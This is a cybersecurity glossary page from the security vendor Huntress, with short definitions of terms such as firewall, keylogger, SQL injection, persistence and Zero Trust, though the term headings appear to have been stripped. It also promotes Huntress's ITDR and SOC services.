Cybersecurity is becoming even more important in today’s world. From people protecting their personal information to organizations safeguarding their sensitive data, you need to understand these cybersecurity terms.
Check out Huntress's comprehensive cybersecurity glossary to learn key cybersecurity terminology and the most commonly used words and phrases of cybersecurity professionals use. Consider this your cybersecurity encyclopedia to help you make informed decisions about online security and stay updated on emerging threats.
Code files or programs that instruct a computer to perform specific actions when opened.
Taking advantage of vulnerabilities in systems or software to perform malicious acts.
XDRs collect and correlate data from various sources, including endpoints, cloud workloads, networks, and emails, to help mitigate cyber threats, unauthorized access, and other forms of misuse.
FISMA is a U.S. federal law enacted in 2002 that requires federal agencies to implement information security programs to protect their data and information systems. It sets standards for how agencies should assess, manage, and mitigate cybersecurity risks.
File Integrity Monitoring is a security process that monitors and analyzes the integrity of assets including file systems, directories, databases, and the Operating System.
Fileless malware operates entirely within a computer's memory without ever touching the hard drive. This malicious software may either use legitimate tools or embed code in legitimate files, making detection difficult.
A firewall is a security system that monitors and filters incoming and outgoing network traffic to prevent unauthorized access to an organization's network. It acts as an outer barrier that either allows or blocks network traffic based on a predefined set of rules. It scans specific data packets—units of communication sent over networks—for malicious code or known threats. If a data packet is flagged, the firewall prevents it from entering the network.
Methods used by threat actors to reinstall malware on a device after it has been cleaned. Also known as “Persistence Mechanisms.”
A macOS TCC permission that allows software to access sensitive user information.
The GDPR is a European Union regulation on information privacy that governs how the personal data of people in the EU can be processed and transferred.
This type of attack refers to exploiting weaknesses in Kerberos to gain unauthorized access to Windows Active Directory controls, requiring initial system access.
Google Cloud Platform is one of the 3 major cloud providers. GCP lets businesses use Google's infrastructure and technology to build and run applications, analyze data, and power their operations.
A US federal law established in 1996, HIPAA mandates the protection and confidential handling of people’s medical information.
Honeypots are cybersecurity mechanisms that gather intelligence on cybercriminals' identities, methods, and motivations. They use decoy targets to lure cybercriminals away from legitimate targets.
A unique identifier for a device connected to the internet, represented as a string of numbers and characters.
Intrusion Prevention System is a form of network security that can identify malicious activity, collect information about said activity, report it and attempt to block or stop it. An IPS works by actively scanning and analyzing network traffic for malicious activities and known attack patterns. Similar to an IDS, intrusion prevention systems are designed to warn of suspicious activity, but the key difference is that they can also take automated action and respond to active threats based on a predetermined set of rules.
Identity Threat Detection and Response (ITDR) is a cybersecurity framework that helps protect user identities and systems from cyberattacks.
A cybersecurity discipline that focuses on helping organizations and individuals protect their identity infrastructure and assist with remediation related to identity-centric attacks.
Incident response in cybersecurity refers to the strategies and procedures for responding to cyber threats and attacks in a network.
InfoSec is the policies and procedures put in place by the organization to protect sensitive data from unauthorized access.
IaaS is a type of cloud computing where the provider offers the customer the ability to create virtual networks within a cloud-based computing environment.
The point of entry into a network or system; Process by which an adversary gains entry (the initial foothold) to a victim’s network or system.
In cybersecurity, integrations describe the capability of different computers and software systems to work together and exchange data.
IDS is a security tool that detects the presence of cyber threats and notifies administrators. HIDS (Host-based Intrusion Detection) and NIDS (Network-based Intrusion Detection) can also be used, which are IDS tools used specifically for either the endpoints (host) or the network.
JIT refers to enabling specific privileges only when needed and disabling it when no longer required. This significantly reduces the window of vulnerability and minimizes the risk of unauthorized access or misuse of elevated privileges.
Using cryptography, Kerberos is an authentication protocol that verifies the identity of users and hosts.
A keylogger is a software that an attacker uses to record keystrokes remotely on a physical keyboard and capture passwords or other critical information.
A LAN is a grouping of electronic devices in the same physical location.
Giving users the minimum access necessary to perform their job functions, least privilege is a security measurement that limits access to sensitive data to only the people who truly need it for their work.
Machine learning lets computers learn from data and make decisions or predictions without being programmed to do so.
Malspam is a spam email that delivers malware, often through malicious attachments (like infected documents or executables) or links that, when clicked, download malware onto the recipient's device.
Malicious software designed to harm a computer, network, or server. Malware includes things like viruses, worms, Trojans, ransomware, spyware, or adware.
Malware analysis is the process of understanding the behavior and purpose of suspicious files or URLs to help detect and mitigate potential threats.
This type of cyber attack involves a threat actor putting themselves in the middle of two parties, normally a user and an application, to intercept their communications or data exchanges to use for malicious purposes.
A cybersecurity service combining technology and human expertise to perform threat hunting, monitoring, and response. MDR technology collects and analyzes information from logs, events, networks, endpoints and user behavior—which is then paired with a team of experts who can take over to validate incidents, escalate critical events and provide recommended response actions so threats can be quickly remediated. MDR services are managed or co-managed by an outside partner to provide value to organizations that either have limited resources or lack the expertise to keep eyes on all of their potential attack surfaces.
Managed outside an organization by external vendors, managed IT services providers give businesses the expertise and resources to manage their IT infrastructure and operations. This can include tasks like network management, cybersecurity, data backup and recovery, and software updates, freeing up internal IT staff to focus on strategic initiatives.
Third-party organizations providing outsourced security services.
Enrolling business devices in a SaaS that allows for easily deploying software to a large number of devices at once. Primarily used on macOS.
An authentication method that requires users to provide two or more verification factors before granting access or signing in. These factors can include something only the user would know (e.g., password/PIN), something only the user would have (e.g., token) or something only the user is (e.g., biometric). MFA then uses these factors to confirm the identity of someone who is requesting access to an application, website or another resource. MFA is a key factor in account takeover defense.
NIST is a US agency advancing measurement science, standards, and technology to enhance economic security.
Endpoint firewalls that enable total control over network traffic using dynamic ACLs.
An integrated network security solution designed to detect threats and suspicious behavior on an organization's networks using non-signature-based techniques (such as machine learning and other analytical techniques). NDR solutions track north/south network traffic that crosses the perimeter, as well as east/west lateral traffic to establish a baseline of normal behavior and raise alerts when anomalous behavior is detected. NDR solutions give security teams real-time visibility and awareness over network traffic and the ability to respond to perceived threats.
An expanded version of antivirus that goes beyond performing signature-based detection—typically by incorporating some type of advanced technology—to prevent a wider range of attacks. Unlike traditional AV, next-generation AV focuses on events (files, processes, applications, network connections, etc.) to help identify malicious intent or activity. NGAV has emerged in recent years to address the proliferation of new types of malware and viruses that can easily bypass traditional AV.
Understanding a system's internal state by observing its external outputs.
On-premises is a physical infrastructural setup deployed, running, and maintained within the confines of an organization typically in a datacenter or COLO (Colocation Facility).
OSINT refers to the gathering and analysis of publicly available data for intelligence purposes.
OWASP is an internet community focused on understanding web technologies and exploitations, also known as the OWASP Top 10.
A password management tool is software that stores and protects confidential information like usernames and passwords for local applications and online services. A password manager will house a user’s passwords, as well as other information, in one convenient location with one master password. The information is encrypted and often requires multi-factor authentication to access.
PCI-DSS is a set of rules and guidelines for companies that handle credit card transactions to keep this information safe.
Persistence enables malware by letting the malware keep running—all while the attacker stays undetected.
A persistent foothold is an attacker mechanism to automatically re-trigger some malware (maybe a stub or even fully loaded malware) across potential interruptions like restarts or user logoffs.
Malicious attempts to trick users into revealing sensitive information through deceptive emails or links. Learn more about phishing through our guide, What is Phishing (and How Does It Affect Your Business)?
PaaS is a complete cloud environment that includes everything developers need to build, run and manage applications.
A system or router that acts as a middleman between a user and the internet.
Very different from classical computing, quantum computing refers to advanced computing using quantum-mechanical phenomena.
Ransomware is malicious software that encrypts data and demands payment, usually in the form of cryptocurrency, for its release.
A red team is a group of internal or external IT experts who simulate the actions of adversarial malicious attacks on a network as an exercise.
As the name implies, remote access refers to accessing network resources from a geographical distance through a network connection.
Rogue Apps is a new Managed ITDR capability that enables Huntress to identify unsafe applications installed in a protected tenant. Rogue Apps represents Managed ITDR’s next step in wrecking hacker identity tradecraft. With this new capability, Huntress detects “Traitorware,” which are legitimate apps used badly that we detect by name, and “Stealthware,” which refers specifically to unknown apps that our algorithm marks as suspicious.
SIEM stands for security, information, and event management. SIEM is a software solution that aggregates and analyzes activity from many different sources across an entire IT infrastructure. A SIEM gathers immense amounts of data from an entire networked environment, then consolidates and makes that data human accessible. With the data categorized and laid out, SIEM solutions are often used by security operation centers (SOCs) to streamline visibility across an environment, centralize data for security monitoring and investigate logs and events for incident response.
A switched port analyzer is a dedicated port on a switch that sends a mirrored copy of network traffic from within the core switch or firewall to a destination. People use it to review network traffic using software like Wireshark.
A cyberattack that injects malicious SQL code into an application to view or modify a database.
A centralized unit that deals with security issues on an organizational and technical level. SOCs are typically staffed with a team of domain experts (either in-house or outsourced) who focus on preventing, detecting, analyzing and responding to cybersecurity incidents. A SOC acts as a central command post that continuously monitors an organization’s environments and toolsets and improves its security posture. Learn more about what the Huntress SOC brings to your tech stack.
A collection of software solutions and tools that aggregate security intelligence and context from disparate systems, and applies machine intelligence to streamline (or even completely automate) the threat detection and response process. SOAR combines three software capabilities: the management of threats and vulnerabilities (orchestration), automating security operations (automation) and responding to security incidents (response). Due to its aggregation and automation capabilities, SOAR solutions are often used by security operation centers (SOCs) to collect threat-related data from a range of sources and automate the responses to certain threats.
A session is a time-limited conversation between two or more devices over the internet.
Session hijacking is an attack where a threat actor manipulates a session token to gain unauthorized access to information.
SaaS is a software licensing model which allows access to software on a subscription basis using external servers.
Spear phishing is a targeted phishing attack using researched information to deceive specific individuals.
Unknown and rare applications with broad permissions that provide attackers with a backdoor into the tenant environment. These globally unique, single, or multi-tenanted malicious applications often fly under the radar of traditional security tools and can be leveraged for persistent access, phishing campaigns, and data theft.
An open source detection engine that acts as an IDS (Intrusion Detection System).
A protocol that computer systems use to send event data logs to a central location for storage.
Transmission Control Protocol/Internet Protocol is a set of standardized rules that allow computers to communicate on a network such as the internet
Threat actor refers to people or groups conducting cyberattacks with malicious intent.
Proactively searching across various telemetry for threats is referred to as threat hunting. This involves analyzing system logs, network traffic, and other data sources to uncover malicious activity that may have evaded existing security controls.
Legitimate applications often abused by attackers, such as eM Client, PerfectData Software, and Newsletter Software Supermailer. These applications may appear harmless but can be exploited for malicious activities like phishing, data exfiltration, and financial fraud.
A database stored locally on macOS computers designed to restrict software from accessing sensitive user information. Commonly used for applying Full Disk Access for software.
In cybersecurity, a tunnel is a secure, encrypted connection that lets data be transmitted privately over an untrusted network.
Unauthorized or unwanted access occurs when a person or entity gains access without permission to connect to or use a system and perform malicious actions.
Unified audits combine multiple logs into a single location for centralized viewing and analysis. They comprehensively view security events across the entire IT infrastructure, including endpoints, servers, networks, and cloud environments.
A virtual computer image that behaves like an actual computer, a virtual machine can run its own separate computing environment, typically inside of a server.
Remote work environments often use VPNs as an encrypted tunnel for secure network resource access.
Typically short for voice phishing, vishing involves fraudulent phone calls that trick a victim into giving sensitive data like login credentials, credit card numbers, or bank details.
Vulnerabilities are weaknesses in software or hardware that can be exploited by malicious actors. Examples include a flaw in software, a misconfiguration, or a human error.
In cybersecurity, weaponization uses non-harmful tools or documents maliciously to inflict harm.
WAF is a tool that helps protect web-based applications, mobile apps, and APIs from cyber attacks by filtering and monitoring HTTP traffic between them and the Internet.
XSS is a code injection attack where malicious code is inserted into a legitimate website.
Yara rules define patterns using a specialized rule-writing language. When a file or process is analyzed, Yara compares it against these rules. If the file or process matches the criteria defined in a rule, it's flagged as potentially malicious.
A Zero Trust Architecture refers to the way network devices and services are structured to enable a Zero Trust security model.
ZTNA is an IT technology solution that requires all users to be authenticated, authorized, and continuously validated for security configuration and posture before being granted or keeping access to applications and data.
Zero Trust is a security concept requiring all users to be authenticated and authorized before granting access to applications and data.
Zero-day vulnerabilities are security vulnerabilities unknown to developers, which become exploited by attackers before developers can release a fix.
.svg)
